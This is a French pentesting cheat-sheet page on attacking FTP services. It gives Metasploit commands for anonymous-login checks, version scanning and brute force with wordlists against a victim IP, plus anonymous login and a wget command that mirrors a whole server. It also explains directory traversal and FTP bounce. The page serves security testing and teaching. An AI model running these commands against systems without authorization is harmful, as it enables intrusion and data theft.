Bebzounette
Rechercher…
Bebzounette
Les Bebzounettes
A propos de l'auteur
Sommaire
Services
Echo - 7
FTP - 21
SSH - 22
Telnet - 23
SMTP - 25/465/587
Whois - 43
Finger - 79
POP3 - 110
NTP - 123
MSRPC - 135/593
IMAP - 143
SMB - 445
RDP -3389
References
Social Engineering
Création d'un serveur de phishing
Sténographie
Sténographie basique
Wireless Security
WIFI
ZIGBEE
ZWAVE
GNU-RADIO
Failles Système
Windows
Linux
Mobile & IOT
Failles Réseaux
Modèle OSI & Adressage IPV4
DOS & DDOS
VOIP
Failles Web
CheckList & Méthodologie
Pentest API
Wordpress
Jenkins
IIS Server
Failles Applicative
Buffer-Overflow
Failles Physique
Lock Picking
Matériels
Accès physique à un ordinateur
Forensic
Outils de Forensic
Information gathering
Scans
Client Lourd /Thick Client
Méthodologie Pentest Client Lourd
Active Directory
Reconnaissance
Local Privesc
Reconnaissance en tant qu'Admin local
Lateral Movement
Domain Admin Privesc
Cross Trust Attack
Persistance et Exfiltration
Références
Github Repos
Repos Github
Contact
Propulsé par GitBook
FTP - 21

1. Liste de commandes basiques

Connexion à un serveur ftp :
1
ftp <ip>
Copied!
Lister fichiers dans un serveur ftp
1
ls / dir
Copied!
Récupérer un fichier dans un serveur ftp
1
get <nom du fichier>
Copied!

2. Exploitation d’un serveur FTP mal configuré avec Metasploit :

1
msfconsole use auxiliary/scanner/ftp/anonymousmsf auxiliary(anonymous) >set rhosts <ip victime>msf auxiliary(anonymous) >exploit
Copied!

3. Exploitation d’un serveur FTP mal configuré avec Metasploit :

1
msfconsole use auxiliary/scanner/ftp/ftp_versionmsf auxiliary(anonymous) >set rhosts <ip victime>msf auxiliary(anonymous) >exploit
Copied!

4. FTP sniffing and Brute Force Attack :

1
msfconsole use auxiliary/scanner/ftp/ftp_loginmsf auxiliary(ftp_login) > set rhosts 192.168.01.106msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txtmsf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txtmsf auxiliary(ftp_login) > set stop_on_success truemsf auxiliary(ftp_login) > exploit
Copied!

5. Directory Traversal Attack

Une autre vulnérabilité FTP inclut les attaques de directory traversal dans lesquelles l’attaque réussie écrase ou crée des fichiers non autorisés qui sont stockés à l’extérieur du dossier racine Web.

6. Connexion anonyme

1
ftp <IP>
2
> anonymous
3
> anonymous
4
> ls -a # Lister tous les fichiers (même cachés)
5
> binary #Configurer la transmission en binaire au lieu d'ascii
6
> ascii #Configure la transmission vers l'ascii
7
> bye #exit
Copied!

7. Connexion par le navigateur

Vous pouvez vous connecter à un serveur FTP à l'aide d'un navigateur (comme Firefox) en utilisant une URL comme :
1
ftp://anonymous:[email protected]
Copied!

8. Télécharger tous les fichiers à partir du FTP

1
wget -m ftp://anonymous:[email protected] #Télécharge tout
2
wget -m --no-passive ftp://anonymous:[email protected] #Télécharge tout
Copied!

8. FTP Bounce

Le FTP Bounce signifie Rebond FTP. C’est un cas de spoofing d’adresse IP. Elle est basée sur une utilisation de la commande PORT du protocole FTP lorsque le serveur FTP est en mode actif. En effet, cette commande permet de se connecter à n’importe quel autre serveur distant, et à un port donné. Dans ce cas, il est possible que la sécurité du serveur cible soit compromis, dans le cas ou il effectue une vérification des adresses IP d’origine. En effet, l’adresse IP que le serveur cible verra sera l’adresse IP du serveur FTP, et non de l’adresse IP de l’attaquant.
Ce petit schéma explique la technique utilisée :

9. Fichiers de configuration

1
ftpusers
2
ftp.conf
3
proftpd.conf
Copied!
Services - Précédent
Echo - 7
Suivant - Services
SSH - 22
Dernière mise à jour 7mo ago
Copier le lien
Sommaire
1. Liste de commandes basiques
2. Exploitation d’un serveur FTP mal configuré avec Metasploit :
3. Exploitation d’un serveur FTP mal configuré avec Metasploit :
4. FTP sniffing and Brute Force Attack :
5. Directory Traversal Attack
6. Connexion anonyme
7. Connexion par le navigateur
8. Télécharger tous les fichiers à partir du FTP
8. FTP Bounce
9. Fichiers de configuration